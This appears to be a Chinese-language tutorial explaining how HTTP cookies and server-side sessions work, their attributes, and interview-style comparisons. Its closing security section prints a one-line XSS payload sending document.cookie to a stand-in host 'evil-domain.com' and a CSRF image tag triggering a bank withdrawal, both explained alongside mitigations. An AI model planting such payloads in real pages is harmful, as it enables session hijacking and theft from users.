快速了解cookie和session

Cookie就是在客户端，保存用户的会话状态，

Session就是在服务器端，保存用户的会话状态

                                          Cookie

早期互联网只是用于简单的浏览文档信息、查看黄页、门户网站等等，并没有交互这个说法。但是随着互联网慢慢发展，宽带、服务器等硬件设施已经得到很大的提升，互联网允许人们可以做更多的事情，所以交互式Web慢慢兴起，而HTTP无状态的特点却严重阻碍其发展！

那什么是http无状态呢？无状态协议就是对于事务处理没有记忆能力。也就是说，无法根据之前的状态进行本次的请求处理。例如：要求登陆认证的web页面本身无法进行状态管理，那么每次跳转新页面都要再次登陆。

为了解决HTTP无状态的特性无法满足交互式web，出现了cookie.

那什么是cookie,其实每个cookie就是一小段文本信息，这些文本信息就是用户的会话的状态

（一）、Cookie的工作原理

 

用户在输入用户名和密码之后，浏览器将用户名和密码发送给服务器，服务器进行验证，验证通过之后将用户信息加密后封装成Cookie放在请求头中返回给浏览器。

HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg; Expires=Tue, 15 Aug 2019 21:47:38 GMT; Path=/; Domain=.169it.com; HttpOnly
[响应体]

 

浏览器收到服务器返回数据，发现请求头中有一个：Set-Cookie，然后它就把这个Cookie保存起来，下次浏览器再请求服务器的时候，会把Cookie也放在请求头中传给服务器：

GET /sample_page.html HTTP/1.1
Host: www.example.org
Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg

 

服务器收到请求后从请求头中拿到cookie，然后解析并到用户信息，说明此用户已登录，Cookie是将数据保存在客户端的。

这里我们可以看到，用户信息是保存在Cookie中，也就相当于是保存在浏览器中，那就说用户可以随意修改用户信息，这是一种不安全的策略！

强调一点：Cookie无论是服务器发给浏览器还是浏览器发给服务器，都是放在请求头中的！

（二）、Cookie的属性

1.name&value

Name表示Cookie的名称，服务器就是通过name属性来获取某个Cookie值。

Value表示Cookie 的值，大多数情况下服务器会把这个value当作一个key去缓存中查询保存的数据。

2.Domain&Path

Domain表示可以访问此cookie的域名，假设domain有：.baidu.com 顶级域名,所以这里就会有一个访问规则：顶级域名只能设置或访问顶级域名的Cookie，二级及以下的域名只能访问或设置自身或者顶级域名的Cookie，意思就是只要顶级域为.Baidu.com都可以共享此cookie.Path表示可以访问此cookie的页面路径。比如path=/test，那么只有/test路径下的页面可以读取此cookie。

 

3.Expires/Max-Age

Expires/Max-Age表示此cookie超时时间。若设置其值为一个时间，那么当到达此时间后，此cookie失效。不设置的话默认值是Session，意思是cookie会和session一起失效。当浏览器关闭(不是浏览器标签页，而是整个浏览器) 后，此cookie失效。

提示：当Cookie的过期时间被设定时，设定的日期和时间只与客户端相关，而不是服务端。

4.Size

Size表示Cookie的name+value的字符数，比如有一个Cookie：id=666，那么Size=2+3=5 。

另外每个浏览器对Cookie的支持都不相同

5.HTTP

HTTP表示cookie的httponly属性。若此属性为true，则只有在http请求头中会带有此cookie的信息，而不能通过document.cookie来访问此cookie。
设计该特征意在提供一个安全措施来帮助阻止通过Javascript发起的跨站脚本攻击(XSS)窃取cookie的行为

6.Secure

Secure表示是否只能通过https来传递此条cookie。不像其它选项，该选项只是一个标记并且没有其它的值。

这种cookie的内容意指具有很高的价值并且可能潜在的被破解以纯文本形式传输。

                                       session

（一）、诞生背景

其实在Cookie设计之初，并不是只保存一个key，而是直接保存用户信息，但是由于cookie 是存在用户端，而且它本身存储的尺寸大小也有限，最关键是用户可以是可见的，并可以随意的修改，很不安全。那如何又要安全，又可以方便的全局读取信息呢？于是，这个时候，一种新的存储会话机制：Session 诞生了。

（二）、Session是什么

Session翻译为会话，服务器为每个浏览器创建的一个会话对象，浏览器在第一次请求服务器，服务器便会为这个浏览器生成一个Session对象，保存在服务端，并且把Session的Id以cookie的形式发送给客户端浏览，而以用户显式结束或session超时为结束。

（三）、我们来看看Session工作原理：

以登陆为例

1.当一个用户向服务器发送第一个请求时，获取登陆界面，

2.服务器为其建立一个session，并为此session创建一个标识号（sessionID）。

3.服务器响应请求，并将sessionid封装成cookie，返回登陆界面。

4.客户端收到响应，会将sessionid保存到内存或着硬盘中，这个用户随后的所有请求都应包括这个标识号（sessionID）。

5.http请求，发送用户名和密码，并且带上sessionid，

6.验证用户名和密码成功，修改对应的session值，并将用户的信息放入相对应的session中

7.http响应，显示登陆成功。

从上可以看到，Cookie是将数据直接保存在客户端，而Session是将数据保存在服务端

对于session标识号（sessionID），有两种方式实现：Cookie和URL重写

4.URL地址重写

URL地址重写是对客户端不支持Cookie的解决方案。URL地址重写的原理是将该用户Session的id信息重写 到URL地址中。服务器能够解析重写后的URL获取Session的id。这样即使客户端不支持Cookie，也可以使用Session来记录用户状态。

 

                                                     面试场景

1.Cookie和Session关系

1.都是为了实现客户端与服务端交互而产出

2.Cookie是保存在客户端，但是其信息的完全可见性且易于本地编辑性，往往可以引起很多的安全问题。

3.Session是保存在服务端，会消耗服务器资源，但是相较cookie安全

4.session实现有两种方式：cookie和URL重写

2.Cookie带来的安全性问题

（一）、会话劫持和XSS：在Web应用中，Cookie常用来标记用户或授权会话。因此，如果Web应用的Cookie被窃取，可能导致授权用户的会话受到攻击。常用的窃取Cookie的方法有利用社会工程学攻击和利用应用程序漏洞进行XSS攻击。(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;HttpOnly类型的Cookie由于阻止了JavaScript对其的访问性而能在一定程度上缓解此类攻击。

 

（二）、跨站请求伪造（CSRF）：比如在不安全聊天室或论坛上的一张图片，它实际上是一个给你银行服务器发送提现的请求：<img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory">，当你打开含有了这张图片的HTML页面时，如果你之前已经登录了你的银行帐号并且Cookie仍然有效（还没有其它验证步骤），你银行里的钱很可能会被自动转走。解决CSRF的办法有：隐藏域验证码、确认机制、较短的Cookie生命周期等。

 

3.cookie最典型的应用是：

 （一）：判断用户是否登陆过网站，以便下次登录时能够直接登录。如果我们删除cookie，则每次登录必须从新填写登录的相关信息。

（二）：另一个重要的应用是“购物车”中类的处理和设计。用户可能在一段时间内在同一家网站的不同页面选择不同的商品，可以将这些信息都写入cookie，在最后付款时从cookie中提取这些信息，当然这里面有了安全和性能问题需要我们考虑了。